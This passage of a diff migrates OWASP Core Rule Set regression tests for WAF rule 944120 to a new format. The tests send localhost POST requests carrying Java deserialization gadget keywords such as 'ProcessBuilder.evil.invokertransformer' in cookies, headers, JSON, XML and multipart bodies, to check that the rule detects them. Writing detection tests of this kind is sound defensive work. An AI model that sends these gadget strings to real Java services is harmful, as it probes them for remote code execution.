log_contains: "id \"944120\"" - - test_title: 944120-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 73 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 74 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" 
- method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 75 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 76 desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 77 desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 78 desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS 
test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 79 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 80 desc: 
"Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 81 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 82 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-83 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 83 desc: 
"Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-84 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-85 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 85 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-86 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 86 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 87 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log: + expect_ids: [944120] + - test_id: 88 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 89 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 90 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - 
output: - log_contains: "id \"944120\"" - - test_title: 944120-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 91 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 92 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 93 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 94 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 95 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 96 desc: "Content-Type 
text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 97 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
